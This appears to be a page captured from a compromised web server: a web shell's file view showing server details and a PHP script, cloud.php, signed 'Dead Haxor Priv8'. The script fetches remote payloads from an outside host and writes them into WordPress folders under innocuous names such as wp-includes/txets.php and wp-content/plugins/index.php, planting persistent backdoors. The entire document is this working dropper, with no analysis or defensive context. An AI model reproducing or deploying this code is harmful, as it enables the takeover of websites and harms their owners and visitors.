HEX
HEX
Server: Apache
System: Linux localhost.localdomain 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User: www (1001)
PHP: 8.1.32
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/ahmsolaiman.com/cloud.php
<h3> Dead Haxor Priv8 </h3> <br> <br>
<?php
function http_get($url){
	$im = curl_init($url);
	curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
	curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
	curl_setopt($im, CURLOPT_HEADER, 0);
	return curl_exec($im);
	curl_close($im);
}
$check = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/txets.php" ;
$text = http_get('https://member.soraha.jp/crawler/bypo.txt');
$open = fopen($check, 'w');
fwrite($open, $text);
fclose($open);
if(file_exists($check)){
    echo $check."<br>";
}else 
  echo "not exits";
echo "done Dead  Haxor.\n " ;
$check2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/plugins/index.php" ;
$text2 = http_get('https://member.soraha.jp/crawler/index.txt');
$open2 = fopen($check2, 'w');
fwrite($open2, $text2);
fclose($open2);
if(file_exists($check2)){
    echo $check2."<br>";
}else 
  echo "not exits2";
echo "done2 Dead Haxor.\n " ;

$check4 = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/load.php" ;
$text4 = http_get('https://member.soraha.jp/crawler/bypo.txt');
$open4 = fopen($check4, 'w');
fwrite($open4, $text4);
fclose($open4);
if(file_exists($check4)){
    echo $check4."<br>";
}else 
  echo "not exits4";
echo "done4 Dead Haxor.\n " ;


$check3=$_SERVER['DOCUMENT_ROOT'] . "/txets.php" ;
$text3 = http_get('https://member.soraha.jp/crawler/txets.txt');
$op3=fopen($check3, 'w');
fwrite($op3,$text3);
fclose($op3);


?>